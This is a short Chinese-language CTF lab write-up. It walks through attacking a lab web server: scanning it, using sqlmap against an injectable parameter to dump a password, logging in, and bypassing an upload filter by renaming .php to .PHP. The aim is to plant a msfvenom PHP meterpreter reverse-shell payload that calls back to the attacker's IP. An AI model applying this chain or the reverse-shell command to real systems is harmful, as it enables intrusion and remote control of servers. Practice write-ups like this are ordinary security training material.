CTF—攻防練習之HTTP—SQl注入(get)
攻擊機:192.168.32.152php
靶機 :192.168.32.157web
掃描靶機掃端口:sql
開放了ssh和80
看下ssh版本有沒有漏洞,searchsplot下,沒有發現shell
dirb掃描下目錄,有個admin的打開ssh
進入到一個登陸界面,隨時試了幾個弱口令,不行tcp
用掃描器吧,打開owasp zap掃一下blog
直接掃到了一個注入點 http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下登錄
存在注入,那麼直接,爆庫,爆字段,爆關鍵字,發現了password:map
登進來了
找到一個上傳點im
再製做一個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw
上傳時發現文件名不能包含php,那就改爲PHP便可
上傳成功後,再用msf監聽端口,拿到shell
相關文章
- 1. CTF—攻防練習之HTTP—SQL注入(SSI注入)
- 2. CTF—攻防練習之HTTP—SQL注入(X-forwarded-For)
- 3. CTF練習:SQL注入之get參數注入
- 4. CTF練習:SQL注入之post參數http報文注入
- 5. CTF練習:SQL注入之SSI漏洞
- 6. CTF奪旗-sql注入(get)
- 7. CTF—攻防練習之Capture the Flag
- 8. CTF—攻防練習之HTTP—目錄遍歷
- 9. CTF—攻防練習之HTTP—PUT上傳漏洞
- 10. CTF—攻防練習之HTTP—命令執行漏洞
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • YAML 入門教程
- • Tomcat學習筆記(史上最全tomcat學習筆記)
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
